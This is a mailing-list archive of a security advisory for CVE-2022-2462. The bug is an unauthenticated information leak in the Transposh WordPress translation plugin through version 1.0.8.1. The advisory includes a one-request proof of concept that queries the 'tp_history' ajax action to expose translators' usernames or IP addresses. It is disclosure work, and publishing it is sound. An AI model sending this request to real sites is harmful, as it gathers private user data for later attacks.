[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] =?windows-1252?q?=5BCVE-2022-2462=5D_Transposh_=3C=3D_1=2E0?= =?windows-1252?q?=2E8=2E1_=93tp=5
From: "Julien Ahrens (RCE Security)" <info () rcesecurity ! com>
Date: 2022-07-22 14:48:58
Message-ID: A2CCC878-3D86-45E0-BA9B-10DFEC8BB630 () rcesecurity ! com
[Download RAW message or body]
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: Transposh WordPress Translation
Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/
Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]
Date found: 2022-07-13
Date published: 2022-07-22
CVSSv3 Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CVE: CVE-2022-2462
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Transposh WordPress Translation 1.0.8.1 and below
4. INTRODUCTION
===============
Transposh translation filter for WordPress offers a unique approach to blog
translation. It allows your blog to combine automatic translation with human
translation aided by your users with an easy to use in-context interface.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Transposh offers an ajax action called "tp_history" which is intended to return
data about who has translated a text given by the "token" parameter. However, the
plugin also returns the user's login name as part of the "user_login" attribute.
Successful exploits can allow an unauthenticated attacker to leak the WordPress
username of translators. If an anonymous user submitted the translation, then the
user's IP address is returned.
6. PROOF OF CONCEPT
===================
The following Proof-of-Concept returns the information of the translated text
"Calendly URL":
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [host]
Content-Length: 36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0
Connection: close
action=tp_history&token=Calendly%20URL&lang=en
7. SOLUTION
===========
None. Remove the plugin to prevent exploitation.
8. REPORT TIMELINE
==================
2022-07-13: Discovery of the vulnerability
2022-07-13: CVE requested from WPScan (CNA)
2022-07-18: No response from WPScan
2022-07-18: CVE requested from Wordfence (CNA) instead
2022-07-18: Sent note to vendor
2022-07-18: Wordfence assigns CVE-2022-2462
2022-07-20: Vendor states that there is no update planned so far
2022-07-22: Public disclosure
9. REFERENCES
=============
https://github.com/MrTuxracer/advisories
["signature.asc" (signature.asc)]
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEWVym3nC1+ioyX1+TzjvwrNEH1JsFAmLauNkACgkQzjvwrNEH
1Jv7zBAAuQ37koarxd8ZIAXMolupK3BqHeNBE0LnG+IUB//HLdxo3nJfvSPccyWb
wwWeKJSt+le8jbD1XihrmvdpNu7vuk9IyWKif0CbT5NfehWKVVFvmjX3dlPrJJUx
seug1ds3zJPqZHDR7cJmZqHMF2lIMZBpJaPfsbZ9RKujpH8G87iDPRfC6kuAB+qu
8XUsbXReulYMSk4v+dM/ntE8P4VHHIgo7Lu58g6TO0u+wgjUA73S4ZrA6pgWi5YL
UY23edcxo0qhjsyuwOMWl64LVkT/8VpI9HC5UN/Ve8GUAtaKhxta+BXUsEKFzebU
fOuy73CuGUyS6+rbWnPK9VLekv1rUCpSsEB6zRQSJoVtGKTxk4wi06mBDxLPCMSh
InUU6A7sFbe3vZ7zlZWJKtA0HhJB00hBa8e7kIgnVL8AbS+5WeaeZnswa19ZErlK
I4hPZPihGyRZlz9sDfLrQLdfjlMIpfIVlVOWIrCM8w6X4XCDu4NCxqaCE68bZC5a
J9JhEPKDDHQZ2unT14iWb4UWfELb4P2gPouC4Aj1dd7auSzcgabFEEBmYo+VOdHC
1CHUTwu29E1MiWaV4e8U7a2DDgkbywxKhoGAEy39YMx45h7shXH+4cIOWC9WAjim
ap0dA1PFxe6sPgC+4/BIWyDA1IOmyC/GB7V4nwzYyyKZ6ZZ0ArQ=
=veiz
-----END PGP SIGNATURE-----
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
--===============4607841930899185378==--
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic